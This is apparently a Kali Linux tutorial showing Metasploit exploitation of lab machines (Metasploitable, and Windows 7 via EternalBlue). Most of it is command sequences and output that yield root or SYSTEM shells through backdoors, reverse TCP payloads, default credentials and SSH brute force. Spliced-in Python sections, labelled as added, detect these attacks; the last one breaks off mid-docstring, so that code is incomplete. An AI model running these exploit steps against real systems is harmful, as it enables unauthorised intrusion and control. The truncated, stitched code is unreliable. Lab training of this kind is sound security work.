Kali Linux – Exploitation and Gaining Access: An In-Depth Guide

Delve deep into the world of cybersecurity with our comprehensive guide on ‘Kali Linux – Exploitation and Gaining Access’. This article is part of our dedicated series on cybersecurity and ethical hacking techniques.

Understanding Metasploit Framework in Kali Linux

Metasploit Framework, an essential tool in Kali Linux, offers various modules for exploiting vulnerabilities. This section elucidates the framework and its modules.

Key Modules of Metasploit Framework

The Metasploit Framework in Kali Linux consists of several critical modules, each serving unique purposes in the exploitation process.

    Utilizing msfconsole and msfvenom

    Learn how to navigate through the Metasploit Framework using msfconsole and craft custom payloads with msfvenom.

      Real-world Exploitation Scenarios

      Explore various real-world exploitation scenarios, demonstrating the practical application of Kali Linux’s tools.

      Conclusion

      This article offers a profound understanding of how to utilize Kali Linux for effective exploitation and gaining access in various scenarios, providing a crucial skill set for any aspiring cybersecurity professional.

      • path to the Metasploit Framework: cd /usr/share/metasploit-framework/

      The Metasploit Framework contains 7 module types:

      • exploits (buffer overflow, code injection, web application)
      • auxiliary (does not execute a payload as an exploit module does; instead it is used to perform different actions such as scanning, fuzzing or denial of service: information gathering, fingerprinting, scanning)
      • post (used, as the name says, after exploiting the target, to gather or steal information from the target device: files, saved passwords, dumping hashes, enumerating services and applications on the target)
      • payloads (delivered to the target with an exploit in order to control the machine: singles are payloads that are completely stand-alone | stagers set up a network connection between the attacker and the victim, and are small and reliable (bind or reverse; almost all the time we will use reverse TCP) | stages are payload components that are downloaded by stager modules and can provide advanced features with no size limit, for example Meterpreter shells (in effect malware, a trojan or virus) that can download files, upload files, record the microphone, run the webcam, take screenshots, etc.)
      • encoders (help evade antivirus detection)
      • evasion (similar to encoders, mainly designed to evade Windows Defender)
      • nops (a no-operation is an instruction that tells the processor to do nothing; useful in buffer overflows to take up a lot of space in memory before the payload executes)

      msfconsole and msfvenom

      To run the Metasploit Framework simply run msfconsole in the terminal

      • use show payloads command to list all the payloads

      • to use a certain module use the command use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
      • use show info to get more details about what the selected module can do
      • use show options to understand what the module needs to function
      • use set <parameter name> <value>, for example LHOST, to change a default that is already configured, such as the IP address
      • running show payloads again will now not list all the payloads but only the ones that are compatible with the currently selected exploit
      • use set payload <payload name> to replace the default selected payload with the one you have chosen
      • use show targets to get a full list of targets that we can exploit using this attack
      • use set target 3 to select the 3rd option listed by running the command above
      • use exploit to run the exploit

      Example 1 – vsftpd 2.3.4

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
      • let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
      • the goal is to find an exploit if this software is vulnerable
      • as an initial action, before googling for possible exploits, you can use the Metasploit Framework
      • on terminal2: run $ searchsploit vsftpd 2.3.4
      • on terminal3: run msfconsole and then type: msf6 > search vsftpd
      • msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
      • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
      • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
      • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
      • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
      • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets

      msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

      [*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
      [*] 192.168.222.127:21 – USER: 331 Please specify the password.
      [+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
      [+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
      [*] Found shell.
      [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400

      whoami
      root
      ifconfig
      eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
      inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
      inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link

      • to exit a shell just type: exit

      exit
      [*] 192.168.222.127 – Command shell session 1 closed.
      msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

       

      Example 2 – Misconfigured bindshell

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
      • let’s choose the 1524/tcp open bindshell Metasploitable root shell
      • on terminal2 let’s use a tool called netcat (a program used to establish network connections with other machines using both TCP and UDP)
      • to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
        [v1.10-46]
        connect to somewhere: nc [-options] hostname port[s] [ports] …
        listen for inbound: nc -l -p port [-options] [hostname] [port]
      • to use it run:

      ┌──(mrhacker㉿kali)-[~/Desktop]
      └─$ nc 192.168.222.127 1524
      root@metasploitable:/#

       

      Example 3 – telnet

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
      • let’s choose the 23/tcp open telnet Linux telnetd
      • on terminal2: run $ searchsploit Linux telnetd | no real helpful results found
      • let’s try the default username and password: telnet 192.168.222.127

      ┌──(mrhacker㉿kali)-[~]
      └─$ telnet 192.168.222.127
      Trying 192.168.222.127…
      Connected to 192.168.222.127.
      Escape character is ‘^]’.
      [Metasploitable ASCII-art banner]

      Warning: Never expose this VM to an untrusted network!
      Contact: msfdev[at]metasploit.com
      Login with msfadmin/msfadmin to get started

      metasploitable login: msfadmin
      Password:
      Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
      Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

      The programs included with the Ubuntu system are free software;
      the exact distribution terms for each program are described in the
      individual files in /usr/share/doc/*/copyright.

      Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
      applicable law.

      To access official Ubuntu documentation, please visit:
      http://help.ubuntu.com/
      No mail.
      msfadmin@metasploitable:~$ whoami
      msfadmin
      msfadmin@metasploitable:~$ sudo su
      [sudo] password for msfadmin:
      root@metasploitable:/home/msfadmin# whoami
      root
      root@metasploitable:/home/msfadmin#

       

      Example 4 – Samba

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
      • let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
      • and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
      • on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
      • on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
      • let’s then look under auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
      • msf6 auxiliary(scanner/smb/smb_version) > show info
      • msf6 auxiliary(scanner/smb/smb_version) > show options
      • msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
      • msf6 auxiliary(scanner/smb/smb_version) > exploit
      • valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
      • on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the txt files and the py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 – ‘Username map script’ Command Execution (Metasploit) – unix/remote/16320.rb
      • back in msfconsole on terminal3: msf6 > search Samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
      • msf6 > use exploit/multi/samba/usermap_script
      • msf6 exploit(multi/samba/usermap_script) > show info
      • msf6 exploit(multi/samba/usermap_script) > show options
      • msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
        RHOSTS => 192.168.222.127
        msf6 exploit(multi/samba/usermap_script) > run
        [*] Started reverse TCP handler on 192.168.222.59:4444
        [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400
        whoami
        root

      Example 5 – Brute-force SSH Attack

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
      • let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
      • on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
      • msf6 > use auxiliary/scanner/ssh/ssh_login
      • on terminal3, in /home/mrhacker/Desktop: nano usernames.txt | type in a few possible usernames, including the correct one: admin, root, toor, user123, msfadmin, admin123 | one per line
      • on terminal3, in /home/mrhacker/Desktop: nano passwords.txt | type in a few possible passwords, including the correct one: password, password123, helloworld, msfadmin, test1234 | one per line
      • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
        PASS_FILE => /home/mrhacker/Desktop/passwords.txt
      • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
        USER_FILE => /home/mrhacker/Desktop/usernames.txt
      • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
        RHOSTS => 192.168.222.127
      • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
        VERBOSE => true
      • msf6 auxiliary(scanner/ssh/ssh_login) > exploit
      • [+] 192.168.222.127:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘
        [*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
        [-] 192.168.222.127:22 – Failed: ‘admin123:password’
      • msf6 auxiliary(scanner/ssh/ssh_login) > sessions
      • msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
        [*] Starting interaction with 1…
        whoami
        msfadmin
        sudo su
        [sudo] password for msfadmin: msfadmin
        whoami
        root
      • as we now have the username and password we could ssh into the machine using the discovered credentials: msfadmin/msfadmin
      • ┌──(mrhacker㉿kali)-[~]
        └─$ ssh msfadmin@192.168.222.127
        msfadmin@192.168.222.127’s password:
        Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
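As an added example (not part of the original post), here is what the ssh_login run above looks like from the target's side and how a defender would catch it: a Python script that reads sshd lines from auth.log and flags both the burst of failed passwords and the login that succeeds right after them. The log lines are constructed to mirror the wordlists above, and the year 2021 and the 5-failures-in-60-seconds threshold are assumptions.

```python
"""Server-side view of the ssh_login run in Example 5: detect password guessing in sshd logs."""
import re
from collections import defaultdict
from datetime import datetime

# Patterns for the two sshd messages that matter here (syslog lines carry no year).
_PREFIX = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAILED = re.compile(_PREFIX + r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+")
ACCEPTED = re.compile(_PREFIX + r"Accepted password for (?P<user>\S+) from (?P<src>[\d.]+) port \d+")


def parse_ts(ts, year=2021):
    """Syslog timestamps lack the year; the caller supplies it (assumed 2021, as in the post)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect(lines, threshold=5, window_s=60):
    """Return (source_ip, kind, detail) alerts.

    kind 'bruteforce': at least `threshold` failed passwords from one source within `window_s` seconds.
    kind 'success-after-failures': a login accepted from a source that still has recent failures,
    which is exactly what ssh_login produces when one wordlist entry is right (msfadmin:msfadmin).
    """
    failures = defaultdict(list)   # source ip -> timestamps of failures inside the window
    users = defaultdict(set)       # source ip -> usernames tried
    flagged = set()
    alerts = []
    for line in lines:
        m = FAILED.match(line)
        if m:
            t, src = parse_ts(m["ts"]), m["src"]
            users[src].add(m["user"])
            # Slide the window: keep only failures within window_s of this one, then add it.
            failures[src] = [x for x in failures[src] if (t - x).total_seconds() <= window_s] + [t]
            if len(failures[src]) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append((src, "bruteforce",
                               f"{len(failures[src])} failures in {window_s}s, users tried: {sorted(users[src])}"))
            continue
        m = ACCEPTED.match(line)
        if m and failures.get(m["src"]):
            alerts.append((m["src"], "success-after-failures",
                           f"'{m['user']}' accepted after {len(failures[m['src']])} recent failures"))
    return alerts


# Constructed auth.log excerpt mirroring the ssh_login run in the post (attacker 192.168.222.59,
# usernames from usernames.txt). A legitimate login from 10.0.0.5 is mixed in and must not alert.
SAMPLE_LOG = """\
Aug 19 06:28:55 metasploitable sshd[4410]: Failed password for invalid user admin from 192.168.222.59 port 33090 ssh2
Aug 19 06:28:56 metasploitable sshd[4412]: Failed password for root from 192.168.222.59 port 33091 ssh2
Aug 19 06:28:57 metasploitable sshd[4414]: Failed password for invalid user toor from 192.168.222.59 port 33092 ssh2
Aug 19 06:28:58 metasploitable sshd[4416]: Failed password for invalid user user123 from 192.168.222.59 port 33093 ssh2
Aug 19 06:29:00 metasploitable sshd[4418]: Failed password for msfadmin from 192.168.222.59 port 33094 ssh2
Aug 19 06:29:02 metasploitable sshd[4420]: Accepted password for bob from 10.0.0.5 port 51000 ssh2
Aug 19 06:29:09 metasploitable sshd[4422]: Accepted password for msfadmin from 192.168.222.59 port 33103 ssh2
Aug 19 06:29:10 metasploitable sshd[4424]: Failed password for invalid user admin123 from 192.168.222.59 port 33104 ssh2
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

The same counters are what a lockout rule (fail2ban or sshd's own limits) acts on; the fix for this example is key-only authentication, which removes the password path entirely.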

      Example 6 – distccd

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
      • let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
      • on terminal2: msfconsole and then run: msf6 > search distc | only one record found: exploit/unix/misc/distcc_exec
      • msf6 > use exploit/unix/misc/distcc_exec
      • msf6 exploit(unix/misc/distcc_exec) > show options
      • msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
      • msf6 exploit(unix/misc/distcc_exec) > show payloads
      • msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
        payload => cmd/unix/reverse
      • msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listening host)
        LHOST => 192.168.222.59
      • msf6 exploit(unix/misc/distcc_exec) > exploit
        [*] Started reverse TCP double handler on 192.168.222.59:4444
        [*] Accepted the first client connection…
        [*] Accepted the second client connection…
        [*] Command: echo 9JUz23ZkTBY4MuQx;
        [*] Writing to socket A
        [*] Writing to socket B
        [*] Reading from sockets…
        [*] Reading from socket B
        [*] B: “9JUz23ZkTBY4MuQx\r\n”
        [*] Matching…
        [*] A is input…
        [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400
        whoami
        daemon
        hostname
        metasploitable
        uname -a
        Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

      Example 7 – UnrealIRCd

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
      • let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
      • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
      • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
      • on terminal3: msfconsole and then run: msf6 > search UnrealIRCd
      • msf6 > use 0
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
        RHOSTS => 192.168.222.127
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
        payload => cmd/unix/reverse
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
      • eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
        LHOST => 192.168.222.59
      • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
        [*] Started reverse TCP double handler on 192.168.222.59:4444
        [*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
        :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
        [*] 192.168.222.127:6667 – Sending backdoor command…
        [*] Accepted the first client connection…
        [*] Accepted the second client connection…
        [*] Command: echo FtAIdHWFZQ9qDwWD;
        [*] Writing to socket A
        [*] Writing to socket B
        [*] Reading from sockets…
        [*] Reading from socket B
        [*] B: “FtAIdHWFZQ9qDwWD\r\n”
        [*] Matching…
        [*] A is input…
        [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400
        whoami
        root
        hostname
        metasploitable
        uname -a
        Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

      Example 8 – drb

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
      • let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
      • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
      • on terminal3: msfconsole and then run: msf6 > search drb
      • msf6 > use exploit/linux/misc/drb_remote_codeexec
      • (this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)

      Example 9 – vnc

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
      • let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
      • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
      • on terminal3: msfconsole and then run: msf6 > search vnc
      • this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but the payload is one for Windows and it will not work
      • let’s try to connect to VNC on the target machine:
      • (mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
        Connected to RFB server, using protocol version 3.3
        Performing standard VNC authentication
        Password: password | the password was password
        Authentication successful

      Example 10 – java-rmi

      • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
      • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
      • let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
      • on terminal2: msfconsole and then run: msf6 > search java rmi
      • msf6 > use exploit/multi/misc/java_rmi_server
        [*] No payload configured, defaulting to java/meterpreter/reverse_tcp
      • msf6 exploit(multi/misc/java_rmi_server) > show options
      • msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
      • msf6 exploit(multi/misc/java_rmi_server) > run
      • msf6 exploit(multi/misc/java_rmi_server) > show sessions
      • msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
      • meterpreter > help
      • meterpreter > shell
        Process 1 created.
        Channel 1 created.
        whoami
        root
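Examples 1 to 10 all start from the same nmap -sV listing, so here is the defender's counterpart as an added example (not code from the post): a Python script that parses that listing and reports which of the services found above are known-bad, with the fix. The scan excerpt is constructed from the lines quoted in the examples (the 445 banner carries the exact version smb_version returned, so the Samba range check runs), and the rule table, function names and remediation text are assumptions drawn from those examples.

```python
"""Defender's triage of `nmap -sV` output against the Metasploitable findings in Examples 1-10."""
import re

# One service line of `nmap -sV` normal output, e.g. "21/tcp   open  ftp   vsftpd 2.3.4".
NMAP_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def version_tuple(text):
    """First dotted version number in a banner, e.g. '3.0.20-Debian' -> (3, 0, 20); None if absent."""
    m = re.search(r"\d+(?:\.\d+)+", text)
    return tuple(int(x) for x in m.group(0).split(".")) if m else None


def samba_issue(banner):
    """nmap only says 'Samba smbd 3.X - 4.X'; in the post the exact version came from smb_version."""
    v = version_tuple(banner)
    if v is None:
        return "Samba version not fingerprinted; confirm with auxiliary/scanner/smb/smb_version"
    if (3, 0, 20) <= v < (3, 0, 25):
        return "Samba 3.0.20 < 3.0.25rc3 'username map script' command execution (usermap_script)"
    return "Samba " + ".".join(map(str, v)) + ": outside the usermap_script range, still review smb.conf"


# (nmap service name, substring the banner must contain, issue, remediation), taken from the examples.
RULES = [
    ("ftp", "vsftpd 2.3.4", "backdoored vsftpd build, root shell via vsftpd_234_backdoor", "upgrade vsftpd"),
    ("bindshell", "", "unauthenticated root shell listening on the port", "remove the service"),
    ("telnet", "", "cleartext login; default credentials msfadmin/msfadmin", "disable telnetd, use SSH with keys"),
    ("ssh", "OpenSSH 4.7", "old OpenSSH with password auth; ssh_login guessed msfadmin/msfadmin",
     "key-only auth, lock out repeated failures, upgrade"),
    ("distccd", "", "distcc executes compile jobs sent over the network (distcc_exec)", "remove distccd"),
    ("irc", "UnrealIRCd", "check it is not the backdoored 3.2.8.1 release (unreal_ircd_3281_backdoor)",
     "reinstall from a verified source"),
    ("drb", "", "Ruby DRb exposed to the network (drb_remote_codeexec)", "bind DRb to localhost"),
    ("vnc", "", "VNC protocol 3.3 with the trivial password 'password'", "strong password, tunnel over SSH"),
    ("java-rmi", "", "RMI registry reachable from the network (java_rmi_server)", "firewall port 1099"),
]


def triage(nmap_output):
    """One finding per open service that matches a rule; services without a rule are not reported."""
    findings = []
    for line in nmap_output.splitlines():
        m = NMAP_LINE.match(line.strip())
        if not m:
            continue  # header, 'Nmap scan report' and closed/filtered lines
        port, service, banner = int(m.group(1)), m.group(3), m.group(4)
        if service == "netbios-ssn" and "Samba" in banner:
            findings.append({"port": port, "service": service, "issue": samba_issue(banner),
                             "fix": "upgrade Samba, remove 'username map script' from smb.conf"})
            continue
        for name, needle, issue, fix in RULES:
            if service == name and needle in banner:
                findings.append({"port": port, "service": service, "issue": issue, "fix": fix})
                break
    return findings


# Constructed scan excerpt assembled from the nmap lines quoted in the post; the 445 banner carries
# the exact version smb_version returned, so that the range check is exercised.
SAMPLE_SCAN = """\
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5900/tcp open  vnc         VNC (protocol 3.3)
6667/tcp open  irc         UnrealIRCd
8787/tcp open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_SCAN):
        print(f"{f['port']:>5} {f['service']:<12} {f['issue']}  ->  {f['fix']}")
```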

      Example 11 – Windows 7 x64 – EternalBlue, NSA-developed Exploit

      • check the IP address of the Windows 7 x64 virtual machine ipconfig: 192.168.222.205
      • on terminal1: run sudo nmap -sS 192.168.222.205
      • let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
      • on terminal2: msfconsole and then run msf6 > search eternalblue
      • let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
      • msf6 > use 4
      • msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
      • msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
      • msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205
        RHOSTS => 192.168.222.205
        msf6 auxiliary(scanner/smb/smb_ms17_010) >
        [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
        [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
        [*] Auxiliary module execution completed
        msf6 auxiliary(scanner/smb/smb_ms17_010) >
      • on terminal2, still in msfconsole: msf6 > search eternalblue
      • now that the check is positive, let’s use the exploit module itself: “exploit/windows/smb/ms17_010_eternalblue”
      • msf6 > use 0
      • msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
      • msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
      • msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
        RHOSTS => 192.168.222.205
        msf6 exploit(windows/smb/ms17_010_eternalblue) > run
        [*] Started reverse TCP handler on 192.168.222.59:4444
        [*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
        [*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
        [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
        [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
        [+] 192.168.222.205:445 – The target is vulnerable.
        [*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
        [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
        [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
        [*] 192.168.222.205:445 – Connecting to target for exploitation.
        [+] 192.168.222.205:445 – Connection established for exploitation.
        [+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
        [*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
        [*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
        [*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
        [*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
        [+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
        [*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
        [*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
        [*] 192.168.222.205:445 – Starting non-paged pool grooming
        [+] 192.168.222.205:445 – Sending SMBv2 buffers
        [+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
        [*] 192.168.222.205:445 – Sending final SMBv2 buffers.
        [*] 192.168.222.205:445 – Sending last fragment of exploit packet!
        [*] 192.168.222.205:445 – Receiving response from exploit packet
        [+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
        [*] 192.168.222.205:445 – Sending egg to corrupted connection.
        [*] 192.168.222.205:445 – Triggering free of corrupted buffer.
        [*] Sending stage (200262 bytes) to 192.168.222.205
        [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        [*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400

      meterpreter > getuid
      Server username: NT AUTHORITY\SYSTEM
      meterpreter > help

      meterpreter > screenshot
      Screenshot saved to: /home/mrhacker/Desktop/OvtUHTeu.jpeg
      meterpreter >
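Added example, not from the original post: the sessions in Examples 1, 4, 6, 7 and 11 leave a distinctive trace in connection logs, either a server that opens an outbound connection back to a host that just connected to one of its services (the reverse TCP handler on 192.168.222.59:4444) or a client reaching a port the server never used to serve (the vsftpd backdoor shell on 6200). The Python below flags both patterns from flow records; the baseline port sets, the 60-second window, the function name and the flow tuples are assumptions constructed from the session lines quoted above.

```python
"""Two session shapes from the post, seen from connection logs: a target that calls back to the
attacker (reverse TCP, Examples 4, 6, 7 and 11) and a new listener on a port the host never
served (the vsftpd backdoor shell on 6200, Example 1)."""
from datetime import datetime, timedelta

# Ports each lab host is expected to serve, i.e. the nmap results in the post (assumed baseline).
BASELINE = {
    "192.168.222.127": {21, 22, 23, 139, 445, 1099, 1524, 3632, 5900, 6667, 6697, 8787},
    "192.168.222.205": {139, 445},
}


def analyse(flows, baseline=BASELINE, window=timedelta(seconds=60)):
    """flows: (timestamp 'YYYY-MM-DD HH:MM:SS', src_ip, src_port, dst_ip, dst_port), any order.
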